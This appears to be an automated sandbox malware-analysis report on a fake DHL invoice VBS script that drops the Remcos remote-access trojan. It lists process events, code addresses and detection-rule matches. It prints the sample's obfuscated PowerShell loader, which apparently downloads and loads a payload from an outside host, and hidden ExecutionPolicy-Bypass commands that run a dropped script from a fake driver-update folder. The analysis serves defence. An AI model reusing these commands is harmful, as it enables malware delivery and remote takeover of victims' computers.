Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [ch
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle | 29_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 29_2_00401806 NtdllDefWindowProc_W | 29_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 29_2_004018C0 NtdllDefWindowProc_W | 29_2_004018C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 30_2_004016FD NtdllDefWindowProc_A | 30_2_004016FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 30_2_004017B7 NtdllDefWindowProc_A | 30_2_004017B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 31_2_00402CAC NtdllDefWindowProc_A | 31_2_00402CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 31_2_00402D66 NtdllDefWindowProc_A | 31_2_00402D66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress | 23_2_004167EF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B9830E9 | 4_2_00007FFD9B9830E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD9B962E11 | 5_2_00007FFD9B962E11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD9B8A7DD0 | 13_2_00007FFD9B8A7DD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD9B970E8D | 13_2_00007FFD9B970E8D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FFD9B8B8780 | 19_2_00007FFD9B8B8780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\pow ershell.exe | Code function: 19_2_00007FFD9B980E8D | 19_2_00007FFD9B980E8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 21_2_10017194 | 21_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 21_2_1000B5C1 | 21_2_1000B5C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0043706A | 23_2_0043706A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_00414005 | 23_2_00414005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0043E11C | 23_2_0043E11C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_004541D9 | 23_2_004541D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_004381E8 | 23_2_004381E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0041F18B | 23_2_0041F18B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_00446270 | 23_2_00446270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0043E34B | 23_2_0043E34B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_004533AB | 23_2_004533AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0042742E | 23_2_0042742E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_00437566 | 23_2_00437566
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0043E5A8 | 23_2_0043E5A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_004387F0 | 23_2_004387F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0043797E | 23_2_0043797E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_004339D7 | 23_2_004339D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0044DA49 | 23_2_0044DA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_00427AD7 | 23_2_00427AD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0041DBF3 | 23_2_0041DBF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_00427C40 | 23_2_00427C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_00437DB3 | 23_2_00437DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_00435EEB | 23_2_00435EEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0043DEED | 23_2_0043DEED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_00426E9F | 23_2_00426E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 29_2_0044B040 | 29_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 29_2_0043610D | 29_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 29_2_00447310 | 29_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 29_2_0044A490 | 29_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040755A29_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0043C56029_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044B61029_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044D6C029_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004476F029_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044B87029_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044081D29_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0041495729_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004079EE29_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00407AEB29_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044AA8029_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00412AA929_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00404B7429_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00404B0329_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044BBD829_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00404BE529_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00404C7629_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00415CFE29_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00416D7229_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00446D3029_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00446D8B29_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00406E8F29_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0040503830_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0041208C30_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_004050A930_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0040511A30_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0043C13A30_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_004051AB30_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044930030_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0040D32230_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044A4F030_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0043A5AB30_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0041363130_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044669030_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044A73030_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_004398D830_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_004498E030_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044A88630_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0043DA0930_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00438D5E30_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00449ED030_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0041FE8330_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00430F5430_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_004050C231_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_004014AB31_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_0040513331_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_004051A431_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_0040124631_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_0040CA4631_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_0040523531_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_004032C831_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_0040168931_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00402F6031_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434801 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00416760 appears 69 times
                    Source: DHLShippingInvoicesAwbBL000000000102220242247.vbsInitial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 11450
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2020
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
